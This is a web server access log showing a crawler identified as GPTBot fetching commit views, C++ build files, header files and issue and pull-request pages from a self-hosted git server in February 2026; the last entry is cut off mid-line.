git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" +[17/Feb/2026:18:03:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" +[17/Feb/2026:18:03:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=rendered" [Client 74.7.227.38] [Length 11059] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:18:03:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11160] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:18:03:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14174] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:18:03:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11185] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:03:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:18:03:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11033] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:03:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:18:03:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14173] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:18:03:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=rendered" [Client 74.7.227.38] [Length 11059] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:18:03:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:18:03:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=rendered" [Client 74.7.227.38] [Length 11055] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:18:03:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11133] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:18:03:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11183] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:03:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:03:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:18:03:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:18:03:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:18:03:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11160] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:18:03:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11184] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:03:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:03:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10128] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:18:03:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10127] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&state=all&type=all" +[17/Feb/2026:18:03:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11037] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:03:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11066] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:03:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11066] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:03:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11066] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:03:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11003] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:03:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&state=open&type=all" +[17/Feb/2026:18:03:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10159] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&state=open&type=all" +[17/Feb/2026:18:03:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 9965] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&state=open&type=all" +[17/Feb/2026:18:03:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9947] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&state=all&type=all" +[17/Feb/2026:18:03:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&state=open&type=all" +[17/Feb/2026:18:03:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:18:03:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:18:03:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:03:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:03:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:18:03:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:03:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10149] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:18:03:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject%2findustrial-comm%2fcpp%2fsrc" [Client 74.7.227.38] [Length 61096] [Gzip 12.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src" +[17/Feb/2026:18:03:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fcpp%2fsrc" [Client 74.7.227.38] [Length 31473] [Gzip 6.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src" +[17/Feb/2026:18:03:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2f.cmake" [Client 74.7.227.38] [Length 62199] [Gzip 14.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake" +[17/Feb/2026:18:03:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11085] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:18:03:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11085] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:03:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin?display=rendered" [Client 74.7.227.38] [Length 11053] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:18:03:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11124] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:18:03:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:03:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=source" [Client 74.7.227.38] [Length 13705] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:18:03:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:18:03:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr 